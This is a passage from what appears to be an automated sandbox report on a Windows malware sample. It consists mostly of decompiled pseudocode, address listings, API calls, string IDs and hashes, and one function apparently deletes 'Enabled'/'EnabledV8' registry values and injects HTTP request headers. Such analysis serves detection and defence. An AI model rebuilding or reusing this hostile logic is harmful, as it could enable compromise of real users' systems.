												_v24 =  *_t224;
											}
											asm("sbb dl, dl");
											_v12 = _v12 >> 2;
											_t250 =  ~(_v24 % ( *(_t269 + 4) & 0x000000ff)) + 1;
											_t261 = 1;
											_a7 = _t250;
											__eflags = _v12 - 1;
											if(_v12 <= 1) {
												L53:
												__eflags = _t250;
												if(_t250 <= 0) {
													L62:
													_t167 =  *0x414ad4; // 0x241f5a8
													_v6 = 1;
													__eflags = _t250 - 1;
													if(_t250 != 1) {
														_t168 =  *((intOrPtr*)(_t167 + 0x188));
													} else {
														_t168 =  *((intOrPtr*)(_t167 + 0x184));
													}
													_a8 = _t168;
													_t169 = E0040F637(_t168);
													_t262 = _a16;
													_t271 = _a12;
													_v16 = _t169;
													_t171 = E0040F0F6( *_t262 + _t220 + _t169 + 0x14, _t271);
													__eflags = _t171;
													if(_t171 != 0) {
														wnsprintfA( &_v52, 0xf, "%%0%uu", _t220);
														wnsprintfA( &_v84, 0xf,  &_v52, _v28);
														 *_t262 =  *_t262 + E0040F19A( *_t271 +  *_t262, _a8, _v16);
														E0040F19A( *_t271 +  *_t262,  &_v84, _t220);
														_t191 =  *_t262 + _t220;
														 *((char*)(_t191 +  *_t271)) = 0xa;
														_t192 = _t191 + 1;
														__eflags = _t192;
														 *_t262 = _t192;
													}
													L68:
													_t263 = _v12;
													_t124 = _t263 + 4; // 0x6
													_t173 = E0040F0F6(_t124,  &_v20);
													_t273 = _v20;
													__eflags = _t173;
													if(_t173 != 0) {
														__eflags = _a7 - 2;
														if(_a7 != 2) {
															_t180 = _v24 + 1;
															__eflags = _t180;
															 *_t273 = _t180;
														}
														_t176 = _t263 << 2;
														 *((intOrPtr*)(_t176 + _t273)) = _v28;
														__eflags = _t176 + 4;
														E00408A2F(_t176 + 4, _t176 + 4, 0,  &_v68, _t273);
													}
													E0040F15E(_t273);
													goto L73;
												}
												_t264 = E0040F1B1( *((intOrPtr*)(_a8 + 0x418)),  *((intOrPtr*)(_a8 + 0x41c)));
												_v16 = _t264;
												__eflags = _t264;
												if(_t264 == 0) {
													goto L68;
												}
												_t251 = _a8;
												_t266 = _t264 -  *((intOrPtr*)(_a8 + 0x418)) + _v36;
												__eflags =  *(_t269 + 2) & 0x00000001;
												if(__eflags == 0) {
													E0040F21C(_t194, _t266, 0x31, _t220);
													L60:
													_t196 = E0040CE43(_t251, __eflags, _v16,  *((intOrPtr*)(_t251 + 0x41c)));
													__eflags = _t196;
													if(_t196 == 0) {
														E0040F15E(_v16);
														goto L68;
													}
													_t250 = _a7;
													goto L62;
												}
												_t274 = _t220 + _t266;
												__eflags = _t266 - _t274;
												if(__eflags >= 0) {
													goto L60;
												} else {
													goto L57;
												}
												do {
													L57:
													_push(0x30);
													_t198 = 0x39;
													 *_t266 = E004102A8(_t198);
													_t266 = _t266 + 1;
													__eflags = _t266 - _t274;
												} while (__eflags < 0);
												_t251 = _a8;
												goto L60;
											} else {
												while(1) {
													__eflags =  *((intOrPtr*)(_t224 + _t261 * 4)) - _v28;
													if( *((intOrPtr*)(_t224 + _t261 * 4)) == _v28) {
														break;
													}
													_t261 = _t261 + 1;
													__eflags = _t261 - _v12;
													if(_t261 < _v12) {
														continue;
													}
													goto L53;
												}
												_a7 = 2;
												_t250 = _a7;
												goto L53;
											}
										}
										goto L39;
									} else {
										goto L35;
									}
									while(1) {
										L35:
										_t202 =  *((intOrPtr*)(_t223 + _t256 + 1));
										__eflags = _t202 - 0x30;
										if(_t202 < 0x30) {
											goto L39;
										}
										__eflags = _t202 - 0x39;
										if(_t202 > 0x39) {
											goto L39;
										}
										_t223 = _t223 + 1;
										__eflags = _t223 - _t246;
										if(_t223 < _t246) {
											continue;
										}
										goto L38;
									}
									goto L39;
								}
								goto L73;
							}
							_t239 = (_t148 & 0x0000ffff) + _t269;
							__eflags =  *_t239 - 0x2a;
							if( *_t239 != 0x2a) {
								L12:
								_t210 = E0040A3D4(_t239, E0040F637(_t239),  *(_t255 + 0x418),  *((intOrPtr*)(_t255 + 0x41c)), 0, 0, 0);
								__eflags = _t210;
								if(_t210 == 0) {
									goto L15;
								}
								goto L13;
							}
							__eflags =  *(_t239 + 1);
							if( *(_t239 + 1) == 0) {
								goto L15;
							}
							goto L12;
						}
						_t212 = E0040A3D4((_t147 & 0x0000ffff) + _t269, E0040F637((_t147 & 0x0000ffff) + _t269),  *(_t255 + 0x418),  *((intOrPtr*)(_t255 + 0x41c)), 0, 0, 0);
						__eflags = _t212;
						if(_t212 == 0) {
							goto L13;
						}
						goto L9;
					}
					goto L73;
				}
			}
































































        0x0040cf01
        0x0040cf0b
        0x00000000
        0x0040cf0d
        0x0040cf14
        0x0040cf2f
        0x0040cf33
        0x0040cf36
        0x0040cf3a
        0x0040cf3c
        0x0040d2de
        0x0040d2e1
        0x00000000
        0x0040cf42
        0x0040cf42
        0x0040cf46
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040cf4c
        0x0040cf4c
        0x0040cf54
        0x0040cf57
        0x00000000
        0x00000000
        0x0040cf5d
        0x0040cf61
        0x0040cf64
        0x0040cff3
        0x0040cff6
        0x0040d000
        0x0040d003
        0x00000000
        0x00000000
        0x00000000
        0x0040d009
        0x0040cf6f
        0x0040cf83
        0x0040cf86
        0x0040cf8b
        0x0040cf8d
        0x00000000
        0x00000000
        0x0040cf8f
        0x0040cf93
        0x0040cf96
        0x0040cfbc
        0x0040cfbc
        0x0040cfc0
        0x0040cfc3
        0x0040d00e
        0x0040d00e
        0x0040d012
        0x0040d014
        0x0040d014
        0x0040d017
        0x0040d01a
        0x0040d01c
        0x0040d01c
        0x0040d020
        0x0040d023
        0x0040d026
        0x0040d028
        0x0040d02a
        0x0040d02a
        0x0040d031
        0x0040d03d
        0x0040d03f
        0x0040d043
        0x0040d0eb
        0x0040d0eb
        0x0040d0ed
        0x00000000
        0x00000000
        0x0040d04a
        0x0040d04d
        0x0040d0ea
        0x0040d0ea
        0x0040d0ea
        0x00000000
        0x0040d0ea
        0x0040d053
        0x0040d057
        0x0040d05b
        0x0040d05e
        0x0040d077
        0x0040d07c
        0x0040d07e
        0x0040d080
        0x0040d080
        0x0040d07e
        0x0040d084
        0x0040d087
        0x0040d089
        0x0040d08b
        0x0040d091
        0x0040d094
        0x0040d096
        0x0040d096
        0x0040d096
        0x0040d096
        0x0040d094
        0x0040d099
        0x0040d09b
        0x0040d09e
        0x0040d09e
        0x0040d0a0
        0x00000000
        0x00000000
        0x0040d0a2
        0x0040d0a3
        0x0040d0a6
        0x0040d0a9
        0x00000000
        0x00000000
        0x00000000
        0x0040d0a9
        0x0040d0ab
        0x0040d0af
        0x0040d0e6
        0x0040d0e9
        0x0040d0e9
        0x00000000
        0x0040d0e9
        0x0040d0b1
        0x0040d0b8
        0x0040d0ba
        0x00000000
        0x00000000
        0x0040d0bc
        0x0040d0be
        0x0040d0c0
        0x0040d0d3
        0x0040d0dd
        0x0040d0e2
        0x0040d0e4
        0x0040d0f8
        0x0040d103
        0x0040d106
        0x0040d10b
        0x0040d115
        0x0040d122
        0x0040d125
        0x0040d12a
        0x0040d12d
        0x0040d130
        0x0040d132
        0x0040d134
        0x0040d134
        0x0040d137
        0x0040d13c
        0x0040d13d
        0x0040d140
        0x0040d149
        0x0040d142
        0x0040d144
        0x0040d144
        0x0040d159
        0x0040d15b
        0x0040d161
        0x0040d163
        0x0040d164
        0x0040d167
        0x0040d16a
        0x0040d183
        0x0040d183
        0x0040d185
        0x0040d1f7
        0x0040d1f7
        0x0040d1fc
        0x0040d200
        0x0040d203
        0x0040d21a
        0x0040d205
        0x0040d205
        0x0040d205
        0x0040d222
        0x0040d225
        0x0040d22a
        0x0040d22f
        0x0040d234
        0x0040d23b
        0x0040d240
        0x0040d242
        0x0040d250
        0x0040d263
        0x0040d27d
        0x0040d28b
        0x0040d294
        0x0040d296
        0x0040d29a
        0x0040d29a
        0x0040d29b
        0x0040d29b
        0x0040d29d
        0x0040d29d
        0x0040d2a0
        0x0040d2a6
        0x0040d2ab
        0x0040d2ae
        0x0040d2b0
        0x0040d2b2
        0x0040d2b6
        0x0040d2bb
        0x0040d2bb
        0x0040d2bc
        0x0040d2bc
        0x0040d2c3
        0x0040d2c6
        0x0040d2ce
        0x0040d2d3
        0x0040d2d3
        0x0040d2d9
        0x00000000
        0x0040d2d9
        0x0040d19b
        0x0040d19d
        0x0040d1a0
        0x0040d1a2
        0x00000000
        0x00000000
        0x0040d1a8
        0x0040d1b1
        0x0040d1b4
        0x0040d1b8
        0x0040d1db
        0x0040d1e0
        0x0040d1eb
        0x0040d1f0
        0x0040d1f2
        0x0040d210
        0x00000000
        0x0040d210
        0x0040d1f4
        0x00000000
        0x0040d1f4
        0x0040d1ba
        0x0040d1bd
        0x0040d1bf
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040d1c1
        0x0040d1c1
        0x0040d1c1
        0x0040d1c5
        0x0040d1cb
        0x0040d1cd
        0x0040d1ce
        0x0040d1ce
        0x0040d1d2
        0x00000000
        0x0040d16c
        0x0040d16c
        0x0040d16f
        0x0040d172
        0x00000000
        0x00000000
        0x0040d174
        0x0040d175
        0x0040d178
        0x00000000
        0x00000000
        0x00000000
        0x0040d17a
        0x0040d17c
        0x0040d180
        0x00000000
        0x0040d180
        0x0040d16a
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040d0c2
        0x0040d0c2
        0x0040d0c2
        0x0040d0c6
        0x0040d0c8
        0x00000000
        0x00000000
        0x0040d0ca
        0x0040d0cc
        0x00000000
        0x00000000
        0x0040d0ce
        0x0040d0cf
        0x0040d0d1
        0x00000000
        0x00000000
        0x00000000
        0x0040d0d1
        0x00000000
        0x0040d0c2
        0x00000000
        0x0040d0f3
        0x0040cfc8
        0x0040cfca
        0x0040cfcd
        0x0040cfd4
        0x0040cfea
        0x0040cfef
        0x0040cff1
        0x00000000
        0x00000000
        0x00000000
        0x0040cff1
        0x0040cfcf
        0x0040cfd2
        0x00000000
        0x00000000
        0x00000000
        0x0040cfd2
        0x0040cfb3
        0x0040cfb8
        0x0040cfba
        0x00000000
        0x00000000
        0x00000000
        0x0040cfba
        0x00000000
        0x0040cf4c

        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID:
        • String ID: %%0%uu$essAsUserA
        • API String ID: 0-3201396839
        • Opcode ID: e4713c1603cecc59f0da45cfc0ecbb99b3b8a0828cff629a1e3e1e56285905fb
        • Instruction ID: cf35a8ef1cb2921f5123bc59124c1333a99e2fd469c5c80858b695ec58b5cced
        • Opcode Fuzzy Hash: e4713c1603cecc59f0da45cfc0ecbb99b3b8a0828cff629a1e3e1e56285905fb
        • Instruction Fuzzy Hash: 14D1C570D04249AFDF10DFA4C880AFEBBB5AF45308F14807AE895BB2C1D739994AC758
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00408322, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 216COMMON
        Download Yara Rule
        C-Code - Quality: 72%
        			E00408322(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				char _v5;
				char _v6;
				signed int _v7;
				char _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _t87;
				void* _t89;
				intOrPtr _t91;
				intOrPtr _t103;
				intOrPtr _t104;
				char* _t108;
				void* _t109;
				signed int _t115;
				signed char _t116;
				signed char _t122;
				intOrPtr* _t132;
				char* _t135;
				void* _t141;
				intOrPtr _t143;
				intOrPtr _t144;
				char _t145;
				intOrPtr _t152;
				void* _t153;
				intOrPtr _t156;
				signed int _t158;

				_t136 = __ecx;
				 *0x414ed8("ssLongW");
				_t138 = _a4;
				_v6 = 0;
				_t87 = E004123F4(0, _a4);
				_v28 = _t87;
				if(_t87 == 0) {
					L51:
					E0040F15E(_a4);
					_t89 =  *0x414edc("ssLongW");
					 *0x414a2c =  *0x414a2c - 1;
					return _t89;
				} else {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					do {
						_t150 = _v28;
						_t132 = _v28 + 0xc;
						_v44 = _t132;
						if( *_t132 <= 0x10) {
							goto L43;
						}
						_t152 = E00412454(_t150);
						_v24 = _t152;
						if(_t152 == 0) {
							goto L43;
						}
						_v20 = _v20 & 0x00000000;
						_v5 = 0;
						if(E004089BF(0, _t136, 0, _t152) != 0) {
							_v5 = 3;
							L37:
							_t141 = E00404196(_t136);
							_t176 = _t141;
							if(_t141 != 0) {
								_t153 = E004124A2(0, _t138, _t176, _t141, 0x4e23, 0x20000000);
								E0040F15E(_t141);
								if(_t153 != 0 &&  *_t153 != 0) {
									_v64 = _v64 & 0;
									_v56 = _v5;
									_v52 = _v20;
									_v48 = _v24;
									_t103 =  *0x414a30; // 0x2210041
									_v72 = _t103;
									_t104 =  *0x414b7c; // 0x418000
									_v68 = _t104 + 0x2a;
									_v84 = _t153;
									_v80 = E0040822E;
									_v76 = E0040831E;
									_v60 =  &_v56;
									E0041333E( &_v84, _t104 + 0x2a);
								}
								E0040F15E(_t153);
							}
							E0040F15E(_v24);
							goto L43;
						}
						_t143 =  *_t132 + _t152;
						_t11 = _t152 + 0x10; // 0x10
						_t108 = _t11;
						_v40 = _t143;
						if(_t108 >= _t143) {
							L35:
							_push(_t132);
							_push(_v24);
							_push(0);
							_t109 = 4;
							E00408A2F(_t109, _t175);
							goto L37;
						}
						while(_v5 == 0) {
							_t135 = _t108;
							if( *_t108 == 0xa) {
								L10:
								_v20 = _v20 + 1;
								_t136 =  &_v32;
								_t138 = _t135;
								if(E0040A600(_t108, _t135,  &_v12,  &_v32) == 0) {
									L32:
									_t56 = _t135 + 1; // 0x11
									_t108 = _t56;
									if(_t108 < _t143) {
										continue;
									}
									_t175 = _v5;
									if(_v5 != 0) {
										goto L37;
									}
									_t132 = _v44;
									goto L35;
								} else {
									_v12 = _v12 + 1;
									_t156 = _v12 - _v32;
									_v7 = 0;
									do {
										_t144 =  *0x414ad4; // 0x241f5a8
										_t136 =  *((intOrPtr*)(_t144 + ( *(0x4141f8 + (_v7 & 0x000000ff) * 8) & 0x0000ffff) * 4));
										_t138 = _t156;
										if(E0040F65D(_v7 & 0x000000ff | 0xffffffff,  *((intOrPtr*)(_t144 + ( *(0x4141f8 + (_v7 & 0x000000ff) * 8) & 0x0000ffff) * 4)), _t156, _v32) == 0) {
											_t158 = (_v7 & 0x000000ff) << 3;
											_t33 = _t158 + 0x4141f8; // 0x1010042
											_t115 =  *_t33 & 0x0000ffff;
											__eflags = _t115 - 0x38;
											if(__eflags != 0) {
												__eflags = _t115 - 0x44;
												if(__eflags != 0) {
													__eflags = _t115 - 0x34;
													if(__eflags != 0) {
														__eflags = _t115 - 0x35;
														if(__eflags != 0) {
															_t38 = _t158 + 0x4141fb; // 0x407e1201
															_t116 =  *_t38;
															_t136 = _v12;
															_t145 = 0;
															_v36 = _v12;
															_v16 = 0;
															__eflags = _t116;
															if(_t116 > 0) {
																_t145 = E0040A332(_t136,  &_v16, _t135,  &_v36, _t116 & 0x000000ff);
															}
															_t44 = _t158 + 0x4141fa; // 0x7e120101
															__eflags = _t145 - ( *_t44 & 0x000000ff);
															if(_t145 >= ( *_t44 & 0x000000ff)) {
																_t48 = _t158 + 0x4141f8; // 0x1010042
																_t122 =  *((intOrPtr*)(_t158 + 0x4141fc))( *_t48 & 0x0000ffff, _v16, _t145, _v36, _t135 - _v12 + 1);
																__eflags = _t122;
																if(_t122 == 0) {
																	_v5 = 4;
																}
															} else {
																_v5 = 2;
															}
															E0040F17A(_t145, _v16);
														} else {
															_v6 = 4;
														}
													} else {
														_v6 = 3;
													}
												} else {
													_v6 = 2;
												}
											} else {
												_v6 = 1;
											}
											break;
										}
										_v7 = _v7 + 1;
									} while (_v7 < 0x19);
									_t143 = _v40;
									if(_v7 == 0x19) {
										_v5 = 1;
									}
									goto L32;
								}
							}
							while(_t135 < _t143) {
								_t135 = _t135 + 1;
								if( *_t135 != 0xa) {
									continue;
								}
								goto L10;
							}
							goto L10;
						}
						goto L37;
						L43:
						_t138 = _a4;
						_t91 = E004123F4(_v28, _a4);
						_v28 = _t91;
					} while (_t91 != 0);
					if(_v6 != 2) {
						__eflags = _v6 - 3;
						if(_v6 != 3) {
							__eflags = _v6 - 4;
							if(_v6 != 4) {
								goto L51;
							}
							_push(0);
							L50:
							E0040B938();
							goto L51;
						}
						_push(1);
						goto L50;
					}
					E0040B712();
					goto L51;
				}
			}













































        0x00408322
        0x0040832d
        0x00408333
        0x00408338
        0x0040833c
        0x00408341
        0x00408346
        0x004085b5
        0x004085b8
        0x004085c2
        0x004085c8
        0x004085cf
        0x0040834c
        0x0040834c
        0x0040834d
        0x0040834e
        0x0040834f
        0x0040834f
        0x00408352
        0x00408358
        0x0040835b
        0x00000000
        0x00000000
        0x00408366
        0x00408368
        0x0040836d
        0x00000000
        0x00000000
        0x00408373
        0x0040837c
        0x00408387
        0x004084f2
        0x004084f6
        0x004084fb
        0x004084fd
        0x004084ff
        0x00408514
        0x00408516
        0x0040851d
        0x00408526
        0x00408529
        0x0040852f
        0x00408535
        0x00408538
        0x0040853d
        0x00408540
        0x00408548
        0x00408551
        0x00408554
        0x0040855b
        0x00408562
        0x00408565
        0x00408565
        0x0040856b
        0x0040856b
        0x00408573
        0x00000000
        0x00408573
        0x0040838f
        0x00408391
        0x00408391
        0x00408394
        0x00408399
        0x004084e2
        0x004084e2
        0x004084e3
        0x004084e6
        0x004084ea
        0x004084eb
        0x00000000
        0x004084eb
        0x0040839f
        0x004083ac
        0x004083ae
        0x004083ba
        0x004083ba
        0x004083bd
        0x004083c4
        0x004083cd
        0x004084ce
        0x004084ce
        0x004084ce
        0x004084d3
        0x00000000
        0x00000000
        0x004084d9
        0x004084dd
        0x00000000
        0x00000000
        0x004084df
        0x00000000
        0x004083d3
        0x004083d3
        0x004083d9
        0x004083dc
        0x004083e0
        0x004083ec
        0x004083f5
        0x004083fb
        0x00408404
        0x00408418
        0x0040841b
        0x0040841b
        0x00408422
        0x00408426
        0x00408431
        0x00408435
        0x00408440
        0x00408444
        0x0040844c
        0x00408450
        0x00408458
        0x00408458
        0x0040845e
        0x00408461
        0x00408463
        0x00408466
        0x00408469
        0x0040846b
        0x00408480
        0x00408480
        0x00408482
        0x00408489
        0x0040848b
        0x0040849d
        0x004084a9
        0x004084af
        0x004084b1
        0x004084b3
        0x004084b3
        0x0040848d
        0x0040848d
        0x0040848d
        0x004084bc
        0x00408452
        0x00408452
        0x00408452
        0x00408446
        0x00408446
        0x00408446
        0x00408437
        0x00408437
        0x00408437
        0x00408428
        0x00408428
        0x00408428
        0x0040842c
        0x0040842c
        0x00408406
        0x00408409
        0x004084c5
        0x004084c8
        0x004084ca
        0x004084ca
        0x00000000
        0x004084c8
        0x004083cd
        0x004083b0
        0x004083b4
        0x004083b8
        0x00000000
        0x00000000
        0x00000000
        0x004083b8
        0x00000000
        0x004083b0
        0x00000000
        0x00408578
        0x0040857b
        0x0040857e
        0x00408583
        0x00408586
        0x00408595
        0x0040859e
        0x004085a2
        0x004085a8
        0x004085ac
        0x00000000
        0x00000000
        0x004085ae
        0x004085b0
        0x004085b0
        0x00000000
        0x004085b0
        0x004085a4
        0x00000000
        0x004085a4
        0x00408597
        0x00000000
        0x00408597

        APIs
        • RtlEnterCriticalSection.NTDLL(ssLongW), ref: 0040832D
        • RtlLeaveCriticalSection.NTDLL(ssLongW), ref: 004085C2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: atorA$ssLongW
        • API String ID: 3168844106-1301449656
        • Opcode ID: f3d30e2d2f332c451886a2572531a256ce274e111580325403cc20487b57ab88
        • Instruction ID: 0c4826fa70bf49913667b6bb5ca71c6b394a18235a6cd4e07e92472ac3393a73
        • Opcode Fuzzy Hash: f3d30e2d2f332c451886a2572531a256ce274e111580325403cc20487b57ab88
        • Instruction Fuzzy Hash: BD81F470D04259AADF21DBA4CA41BEEBBB4AF51304F14407FE980B72C2DB7C5946876D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040D772, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179timenetworkCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040D772(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				struct _SYSTEMTIME _v32;
				char _v48;
				void* __ebx;
				void* __esi;
				intOrPtr _t71;
				signed int _t74;
				signed int _t78;
				signed int _t84;
				signed int _t85;
				signed short _t89;
				signed int _t90;
				intOrPtr _t93;
				void* _t108;
				signed int* _t123;
				void* _t129;
				void* _t131;
				intOrPtr* _t135;
				intOrPtr _t136;
				signed int _t137;

				_t129 = __edx;
				_t126 = __ecx;
				_t119 = L"Enabled";
				if(E004121FF(__ecx, 0x80000001, L"Enabled") != 0) {
					E00412241(__ecx, 0x80000001, L"Enabled");
				}
				_t130 = L"EnabledV8";
				if(E004121FF(_t126, 0x80000001, L"EnabledV8") != 0) {
					E00412241(_t126, 0x80000001, L"EnabledV8");
				}
				if(E004121FF(_t126, 0x80000002, _t119) != 0) {
					E00412241(_t126, 0x80000002, _t119);
				}
				if(E004121FF(_t126, 0x80000002, _t130) != 0) {
					E00412241(_t126, 0x80000002, _t130);
				}
				_t71 = _a20;
				_t128 = ( *(_t71 + 4) & 0x0000ffff) + _t71;
				_v16 = ( *(_t71 + 4) & 0x0000ffff) + _t71;
				if(( *(_t71 + 2) & 0x00000080) == 0) {
					L14:
					_v8 = _v8 & 0x00000000;
					_v12 = _v12 | 0xffffffff;
					_t74 = E004124A2( &_v8, _t129, __eflags, _a4, _a8 + 1, 0x80000000);
					_a8 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L35:
						E0040F15E(_a8);
						L36:
						return _v12;
					}
					__eflags = _v8 - 0x12;
					if(_v8 < 0x12) {
						goto L35;
					}
					_t134 =  *(_a16 + 0x420);
					_t78 = E0040CC82( *(_a16 + 0x420));
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						L18:
						_t131 = _t78 * 0x30 +  *0x414f5c;
						_t30 = _t131 + 0x24; // -4280120
						_t135 = _t30;
						_t84 = E0040F0F6(( *(_t131 + 0x28) + 1) * 0x18, _t135);
						__eflags = _t84;
						if(_t84 == 0) {
							goto L35;
						}
						_t85 =  *(_t131 + 0x28);
						_t123 = _t85 * 0x18 +  *_t135;
						_t136 = _a20;
						 *(_t131 + 0x28) = _t85 + 1;
						_t123[1] = _a8;
						_t123[2] = _v8;
						_t89 =  *(_t136 + 0xc) & 0x0000ffff;
						__eflags = _t89;
						if(_t89 != 0) {
							_t100 = (_t89 & 0x0000ffff) + _t136;
							__eflags = (_t89 & 0x0000ffff) + _t136 | 0xffffffff;
							_t123[5] = E0040F346((_t89 & 0x0000ffff) + _t136 | 0xffffffff, _t100);
						}
						_t90 =  *(_t136 + 0xa) & 0x0000ffff;
						__eflags = _t90;
						if(_t90 != 0) {
							_t97 = (_t90 & 0x0000ffff) + _t136;
							__eflags = (_t90 & 0x0000ffff) + _t136 | 0xffffffff;
							_t90 = E0040F346((_t90 & 0x0000ffff) + _t136 | 0xffffffff, _t97);
							_t123[3] = _t90;
						}
						__eflags = _t123[3];
						if(_t123[3] != 0) {
							L25:
							__eflags = _t90 | 0xffffffff;
							_t123[4] = E0040F346(_t90 | 0xffffffff, _v16);
							goto L26;
						} else {
							__eflags =  *(_t136 + 2) & 0x00000080;
							if(( *(_t136 + 2) & 0x00000080) == 0) {
								L26:
								__eflags =  *(_t136 + 2) & 0x00000010;
								if(( *(_t136 + 2) & 0x00000010) != 0) {
									 *_t123 =  *_t123 | 0x00000001;
									__eflags =  *_t123;
								}
								__eflags =  *(_t136 + 2) & 0x00000020;
								if(( *(_t136 + 2) & 0x00000020) != 0) {
									 *_t123 =  *_t123 | 0x00000002;
									__eflags =  *_t123;
								}
								__eflags =  *(_t136 + 2) & 0x00000040;
								if(( *(_t136 + 2) & 0x00000040) != 0) {
									 *_t123 =  *_t123 | 0x00000004;
									__eflags =  *_t123;
								}
								__eflags =  *(_t136 + 2) & 0x00000080;
								if(( *(_t136 + 2) & 0x00000080) != 0) {
									 *_t123 =  *_t123 | 0x00000008;
									__eflags =  *_t123;
								}
								_t93 =  *0x414ad4; // 0x241f5a8
								HttpAddRequestHeadersA( *(_a16 + 0x420),  *(_t93 + 0x15c), 0xffffffff, 0x80000000);
								_v12 = _v12 & 0x00000000;
								goto L36;
							}
							goto L25;
						}
					}
					_t78 = E0040CCAB(1, _t134);
					__eflags = _t78 - 0xffffffff;
					if(_t78 == 0xffffffff) {
						goto L35;
					}
					goto L18;
				} else {
					E004101CA( &_v48, _t128, E0040F637(_t128));
					_v8 = _v8 & 0x00000000;
					_t108 = E004089BF( &_v8, _t128, 0,  &_v48);
					_t137 = _v8;
					if(_t108 != 0x10) {
						L13:
						E0040F15E(_t137);
						goto L14;
					}
					GetSystemTime( &_v32);
					if( *((intOrPtr*)(_t137 + 6)) != _v32.wDay ||  *((intOrPtr*)(_t137 + 2)) != _v32.wMonth) {
						goto L13;
					} else {
						return E0040F15E(_t137) | 0xffffffff;
					}
				}
			}

























        0x0040d772
        0x0040d772
        0x0040d77b
        0x0040d78e
        0x0040d792
        0x0040d792
        0x0040d797
        0x0040d7a5
        0x0040d7a9
        0x0040d7a9
        0x0040d7bc
        0x0040d7c0
        0x0040d7c0
        0x0040d7ce
        0x0040d7d2
        0x0040d7d2
        0x0040d7d7
        0x0040d7de
        0x0040d7e4
        0x0040d7e7
        0x0040d845
        0x0040d845
        0x0040d84c
        0x0040d85d
        0x0040d862
        0x0040d865
        0x0040d867
        0x0040d974
        0x0040d977
        0x0040d97c
        0x00000000
        0x0040d97c
        0x0040d86d
        0x0040d871
        0x00000000
        0x00000000
        0x0040d87a
        0x0040d880
        0x0040d885
        0x0040d888
        0x0040d89c
        0x0040d8a5
        0x0040d8ae
        0x0040d8ae
        0x0040d8b1
        0x0040d8b6
        0x0040d8b8
        0x00000000
        0x00000000
        0x0040d8be
        0x0040d8c6
        0x0040d8c8
        0x0040d8cc
        0x0040d8d2
        0x0040d8d8
        0x0040d8db
        0x0040d8df
        0x0040d8e2
        0x0040d8e7
        0x0040d8ea
        0x0040d8f2
        0x0040d8f2
        0x0040d8f5
        0x0040d8f9
        0x0040d8fc
        0x0040d901
        0x0040d904
        0x0040d907
        0x0040d90c
        0x0040d90c
        0x0040d90f
        0x0040d913
        0x0040d91b
        0x0040d91e
        0x0040d926
        0x00000000
        0x0040d915
        0x0040d915
        0x0040d919
        0x0040d929
        0x0040d929
        0x0040d92d
        0x0040d92f
        0x0040d92f
        0x0040d92f
        0x0040d932
        0x0040d936
        0x0040d938
        0x0040d938
        0x0040d938
        0x0040d93b
        0x0040d93f
        0x0040d941
        0x0040d941
        0x0040d941
        0x0040d944
        0x0040d948
        0x0040d94a
        0x0040d94a
        0x0040d94a
        0x0040d94d
        0x0040d968
        0x0040d96e
        0x00000000
        0x0040d96e
        0x00000000
        0x0040d919
        0x0040d913
        0x0040d88e
        0x0040d893
        0x0040d896
        0x00000000
        0x00000000
        0x00000000
        0x0040d7e9
        0x0040d7f4
        0x0040d7f9
        0x0040d806
        0x0040d80b
        0x0040d811
        0x0040d83f
        0x0040d840
        0x00000000
        0x0040d840
        0x0040d817
        0x0040d825
        0x00000000
        0x0040d831
        0x00000000
        0x0040d837
        0x0040d825

        APIs
        • HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0040D968
        • GetSystemTime.KERNEL32(?,00000000,?,?,?,00000000,80000002,EnabledV8,80000002,Enabled,80000001,EnabledV8,80000001,Enabled), ref: 0040D817
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FreeHeadersHeapHttpRequestSystemTime
        • String ID: Enabled$EnabledV8
        • API String ID: 2915018814-2402240967
        • Opcode ID: 06a09a679a59eaddef1519b1422e812069dbf1efc018237c8da0100a9ccb550d
        • Instruction ID: e448188ead35d7000306d65881eb1266b53c15934b2c9a1f0b92472dce2de565
        • Opcode Fuzzy Hash: 06a09a679a59eaddef1519b1422e812069dbf1efc018237c8da0100a9ccb550d
        • Instruction Fuzzy Hash: 4451D671900205AADB20EFA5CD46BAF7BF4AF05324F04827AF864F62D1D738D949C768
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004092A5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157networkCOMMON
        Download Yara Rule
        C-Code - Quality: 47%
        			E004092A5(intOrPtr _a4) {
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				void* _v92;
				char _v96;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v124;
				intOrPtr _v140;
				void* __edi;
				void* __esi;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				void* _t68;
				void* _t81;
				intOrPtr* _t84;
				intOrPtr _t90;
				intOrPtr* _t93;

				_t90 = _a4;
				_push(0x2710);
				_t81 = 4;
				_push(_t81);
